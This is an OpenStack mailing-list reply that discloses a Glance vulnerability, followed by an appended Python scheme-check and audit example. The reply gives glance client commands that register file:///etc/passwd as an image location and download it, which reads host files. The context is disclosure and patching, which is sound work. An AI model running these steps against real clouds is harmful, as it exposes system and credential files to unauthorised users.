On 1/7/15 8:47 PM, George Shuklin wrote:
I spent a few hours trying to backport to Havana, but then I found that
Havana seems to be immune to the bug. I'm not 100% sure, so someone else is
advised to look too.

The bug was that Icehouse+ accepts all supported schemes. The fix excludes
'bad' schemes. Havana, though, has an explicitly given list of accepted
schemes for the location field, and 'bad' schemes are not in it.


Havana is certainly not immune. I was able to fetch content from the system fairly easily.

Start with an updated glance client

Modify it as listed in https://bugs.launchpad.net/glance/+bug/1400966/comments/6

$ glance image-create --disk-format raw --container-format bare

$ glance image-update --size 700 <image_id>

$ glance --os-image-api-version 2 location-add --url file:///etc/passwd

$ glance image-download <image_id>


That got me (some of) the contents of /etc/passwd.

The patch I posted prevented this from happening. It blocks adding a location that is file:// based, but still allows other location adds that should be allowed.

https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496

--
-jlk

_______________________________________________
OpenStack-operators mailing list
[email protected]
http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-operators
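
The behaviour the message attributes to the patch (refuse a file:// location, still allow other location adds), as an added Python example that is not the code from the linked commit or from Glance. The function names, the record layout and the "filesystem" alias are assumptions, and the sample records are constructed; the second function audits already-stored locations for the same schemes.

```python
from urllib.parse import urlsplit

# Schemes that resolve to the API host's local disk. "file" is the one named
# in the message; "filesystem" is an assumed alias for the same local store.
RESTRICTED_SCHEMES = frozenset({"file", "filesystem"})


def check_location(url):
    """Return (allowed, reason) for a user-supplied image location URL."""
    if not isinstance(url, str) or not url.strip():
        return False, "empty location"
    # Drop whitespace and control characters that could hide the scheme
    # from a naive prefix check such as url.startswith("file://").
    cleaned = "".join(ch for ch in url.strip() if ch.isprintable())
    scheme = urlsplit(cleaned).scheme.lower()
    if not scheme:
        return False, "no scheme"
    if scheme in RESTRICTED_SCHEMES:
        return False, "restricted scheme: " + scheme
    return True, "ok"


def audit_locations(images):
    """Flag stored images whose locations already use a restricted scheme.

    `images` is a list of dicts with hypothetical keys "id" and "locations".
    """
    findings = []
    for image in images:
        for url in image.get("locations", []):
            allowed, reason = check_location(url)
            if not allowed:
                findings.append((image["id"], url, reason))
    return findings


# Constructed sample records, not taken from any real deployment.
SAMPLE_IMAGES = [
    {"id": "img-1", "locations": ["http://mirror.example.org/cirros.img"]},
    {"id": "img-2", "locations": ["file:///etc/passwd"]},
    {"id": "img-3", "locations": ["FILE:///var/lib/glance/images/x"]},
    {"id": "img-4", "locations": ["swift://account:key@auth.example.org/c/o"]},
]

if __name__ == "__main__":
    for image_id, url, reason in audit_locations(SAMPLE_IMAGES):
        print(image_id, url, reason)
```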
